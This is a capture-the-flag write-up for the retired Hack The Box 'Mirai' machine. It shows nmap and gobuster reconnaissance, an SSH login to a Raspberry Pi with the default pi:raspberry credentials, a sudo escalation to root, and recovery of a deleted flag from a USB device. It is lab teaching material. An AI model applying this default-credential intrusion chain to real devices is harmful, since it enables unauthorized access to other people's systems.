Name: Mirai
Release Date: 01 Sep 2017
Retire Date: 10 Feb 2018
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
burmat 00 days, 03 hours, 11 mins, 50 seconds
5aru 00 days, 03 hours, 24 mins, 56 seconds
Creator: Arrexel
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -oA ./mirai

$  nmap -sC -sV -oA ./mirai
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 18:23 EDT
  Nmap scan report for
  Host is up (0.095s latency).
  Not shown: 997 closed ports
  22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
  | ssh-hostkey: 
  |   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
  |   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
  |   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
  |_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
  53/tcp open  domain  dnsmasq 2.76
  | dns-nsid: 
  |_  bind.version: dnsmasq-2.76
  80/tcp open  http    lighttpd 1.4.35
  |_http-server-header: lighttpd/1.4.35
  |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 30.53 seconds

SSH, DNS, and HTTP.  Judging from the name Mirai, we can deduce that this is an IoT device as the Mirai Botnet singularly
attacked IoT devices.  Let's start with the HTTP service. Simply Navigate to it while GoBuster does it's thing.  Unfortunately, the web page is a bust.  Totally blank. Not even a Default page.  GoBuster found some interesting things though.

  gobuster dir -w /usr/share/dirb/wordlists/big.txt -u
  Gobuster v3.0.1
  by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
  [+] Url:  
  [+] Threads:        10
  [+] Wordlist:       /usr/share/dirb/wordlists/big.txt
  [+] Status codes:   200,204,301,302,307,401,403
  [+] User Agent:     gobuster/3.0.1
  [+] Timeout:        10s
  2020/04/07 18:43:15 Starting gobuster
  /admin (Status: 301)
  /versions (Status: 200)
  2020/04/07 18:45:28 Finished

Let's try navigating to these folders.  /versions is just a file that contains ",v3.1.4,v3.1,v2.10".  /admin on the other
hand paid off quite nicely.

Yep! Right in the Pi-hole.....

So, one of the characteristics of the Mirai botnet is that the IoT devices had never changed the default credentials.
That being said, a quick Google search finds this site https://discourse.pi-hole.net/t/password-for-pre-configured-pi-hole/13629/3

So, let's try SSH with pi:raspberry.  Success!  Small segue.... Even the logon banner says to change the default password.

 ssh pi@
  pi@'s password: 

  The programs included with the Debian GNU/Linux system are free software;
  the exact distribution terms for each program are described in the
  individual files in /usr/share/doc/*/copyright.

  Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  permitted by applicable law.
  Last login: Sun Aug 27 14:47:50 2017 from localhost

  SSH is enabled and the default password for the 'pi' user has not been changed.
  This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

  SSH is enabled and the default password for the 'pi' user has not been changed.
  This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

Let's check the user information before we worry about LinEnum.

  pi@raspberrypi:~ $ id
  uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),

Sweet Georgia with a fiddle! [Burn Notice reference in case anyone else caught that XD].  The user pi is in the sudo group.  Let's see what they can do in sudo.

 pi@raspberrypi:~ $ sudo -l
  Matching Defaults entries for pi on localhost:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

  User pi may run the following commands on localhost:
      (ALL : ALL) ALL

So, the user can do anything in sudo AND it doesn't require a password.  Go ahead and sudo su straight to root. Here's the "gotcha" moment.  User flag? Plain and simple.  Root flag has a bit of a breadcrumb trail.  If we cat the usual locations we get:

 root@raspberrypi:/home/pi/Desktop# cat /root/root.txt
  I lost my original root.txt! I think I may have a backup on my USB stick...

So, we check mount to discover the usbstick is mounted as /media/usbstick.  Inside it, we find a message from James.

root@raspberrypi:/# mount

  sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
  proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
  tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755)
  /dev/sda1 on /lib/live/mount/persistence/sda1 type iso9660 (ro,noatime)
  /dev/loop0 on /lib/live/mount/rootfs/filesystem.squashfs type squashfs (ro,noatime)
  tmpfs on /lib/live/mount/overlay type tmpfs (rw,relatime)
  /dev/sda2 on /lib/live/mount/persistence/sda2 type ext4 (rw,noatime,data=ordered)
  aufs on / type aufs (rw,noatime,si=dd2e2b40,noxino)
  devtmpfs on /dev type devtmpfs (rw,nosuid,size=10240k,nr_inodes=58955,mode=755)
  securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
  tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
  devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
  tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
  tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
  cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent
  pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
  cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
  cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
  cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
  cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
  cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
  cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
  cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
  systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
  hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
  debugfs on /sys/kernel/debug type debugfs (rw,relatime)
  mqueue on /dev/mqueue type mqueue (rw,relatime)
  tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime)
  /dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
  tmpfs on /run/user/999 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=999,gid=997)
  tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=51200k,mode=700,uid=1000,gid=1000)

  root@raspberrypi:/# cd media/usbstick

  root@raspberrypi:/media/usbstick# ls
  damnit.txt  lost+found

  root@raspberrypi:/media/usbstick# cat damnit.txt 
  Damnit! Sorry man I accidentally deleted your files off the USB stick.
  Do you know if there is any way to get them back?


That could put a monkey wrench into the works.  Looking at lost+found doesn't provide any thing useful.  Let's try
strings on /dev/sdb which is where /media/usbstick points to.  Success again!  We have the root flag now.